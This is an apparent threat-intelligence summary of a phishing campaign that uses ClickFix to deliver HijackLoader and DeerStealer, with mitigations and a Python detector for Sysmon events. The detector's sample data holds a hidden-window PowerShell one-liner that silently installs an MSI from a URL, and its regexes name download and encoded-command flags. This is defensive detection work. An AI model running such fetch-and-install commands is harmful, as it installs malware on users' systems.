# Analysis Summary: Cyber-attacks using HijackLoader and DeerStealer have been identified exploiting phishing tactics via ClickFix
## Threat Actor: Unspecified group leveraging HijackLoader and DeerStealer
## Attribution & Identity
The article describes a campaign rather than attributing it to a specific named threat actor group. The activity is being tracked by eSentire’s Threat Response Unit (TRU). DeerStealer malware is noted to be marketed on dark-web forums by a user named **LuciferXfiles**.
## Activity Summary
A new wave of cyber-attacks has been observed utilizing **HijackLoader** and **DeerStealer**. The campaign begins with phishing tactics designed to lure victims into executing malicious commands themselves. The initial access vector is identified as **ClickFix**: victims are redirected to a phishing page that instructs them to paste and run a PowerShell command in the Windows Run prompt. This command downloads an installer (`now.msi`), which starts a chain of execution leading to the deployment of HijackLoader; HijackLoader then injects the DeerStealer payload into memory. HijackLoader has been active since at least 2023.
## Tactics, Techniques & Procedures
- Initial access via phishing, leveraging **ClickFix** for redirection.
- Execution of a PowerShell command via the Windows Run prompt, prompted by the phishing page.
- Deployment of a staged installer (`now.msi`).
- Use of **HijackLoader** for malware delivery and evasion.
- Use of **steganography** by HijackLoader to hide configuration data within PNG images.
- Exploitation of legitimate binaries to run unsigned malicious code.
- In-memory injection of the secondary payload (DeerStealer).
- Use of DeerStealer as an infostealer (subscription-based offering).
## Targeting
- Sectors: Not explicitly detailed, but the nature of the malware (infostealer) suggests targeting organizations or individuals with valuable data.
- Geography: Not specified in the provided text.
- Victims: No specific organizations are mentioned.
## Tools & Infrastructure
- Malware families used: **HijackLoader** (loader), **DeerStealer** (infostealer, also marketed as XFiles Spyware).
- Infrastructure: **ClickFix** phishing page (initial access technique; the page redirects the victim and supplies the command to run).
- Other mentioned artifacts: PowerShell commands, `now.msi` (installer).
- URLs/IPs: None specified for C2 or infrastructure configuration in the summary text.
## Implications
This campaign demonstrates a sophisticated multi-stage chain leveraging established malware like HijackLoader for obfuscation (steganography and in-memory injection) to successfully deploy a powerful, feature-rich infostealer (DeerStealer). The subscription model for DeerStealer suggests an ecosystem encouraging widespread distribution of this capability across different criminal operations.
## Mitigations
The following defensive recommendations follow from the observed TTPs:
- Enhanced security awareness training to protect against phishing lures that direct users to execute PowerShell commands.
- Monitoring for unusual execution of PowerShell via the Windows Run prompt.
- Implementing robust endpoint detection and response (EDR) capable of detecting in-memory injection and exploitation of legitimate binaries (Living Off The Land techniques).
- Scrutiny of files downloaded via initial web redirection or installers like MSI packages.
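Added example, not code from eSentire's report: a small Python detector run over constructed Sysmon-style process-creation events, covering the two observable links in the chain above, namely PowerShell spawned by explorer.exe (the parent of anything launched from the Windows Run prompt) with hidden-window or download flags, and an MSI package installed straight from a URL. Field names follow Sysmon Event ID 1; the events, paths and domain are constructed.

```python
import re

# Constructed Sysmon Event ID 1 style events for testing; not real telemetry.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell.exe -w hidden -c "msiexec /i https://cdn.example.invalid/now.msi /qn"'},
    {"ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": "msiexec /i https://cdn.example.invalid/now.msi /qn"},
    {"ParentImage": r"C:\Program Files\Build\build.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\backup.ps1"},  # benign scheduled script
]

EXPLORER = re.compile(r"\\explorer\.exe$", re.I)
POWERSHELL = re.compile(r"\\(powershell|pwsh)\.exe$", re.I)
MSIEXEC = re.compile(r"\\msiexec\.exe$", re.I)
# Flags typical of a pasted one-liner: hidden window, encoded command, or an inline download.
SUSPICIOUS_FLAGS = re.compile(
    r"(-w(indowstyle)?\s+hidden|-e(nc(odedcommand)?)?\s|downloadstring|invoke-webrequest|https?://)", re.I)
# msiexec asked to install a package directly from a URL (the now.msi stage in the report).
REMOTE_MSI = re.compile(r"msiexec.*?/i\s+https?://\S+\.msi", re.I)


def classify(event):
    """Return the names of the rules that fire for a single process-creation event."""
    hits = []
    parent, image, cmd = event["ParentImage"], event["Image"], event["CommandLine"]
    # Rule 1: the Run dialog is hosted by explorer.exe, so PowerShell whose parent is
    # explorer and whose command line carries hidden/download flags matches the ClickFix pattern.
    if EXPLORER.search(parent) and POWERSHELL.search(image) and SUSPICIOUS_FLAGS.search(cmd):
        hits.append("powershell_from_run_prompt")
    # Rule 2: a remote MSI install, whether msiexec is the process or PowerShell is invoking it.
    if (MSIEXEC.search(image) or POWERSHELL.search(image)) and REMOTE_MSI.search(cmd):
        hits.append("remote_msi_install")
    return hits


def scan(events):
    """Return (index, rules) for every event that trips at least one rule."""
    results = []
    for i, event in enumerate(events):
        rules = classify(event)
        if rules:
            results.append((i, rules))
    return results


if __name__ == "__main__":
    for idx, rules in scan(SAMPLE_EVENTS):
        print(idx, SAMPLE_EVENTS[idx]["Image"], rules)
```

Tune the flag list to your environment: legitimate software deployment tools may also install MSI packages from HTTP locations, so the second rule is best paired with an allow-list of known parent processes.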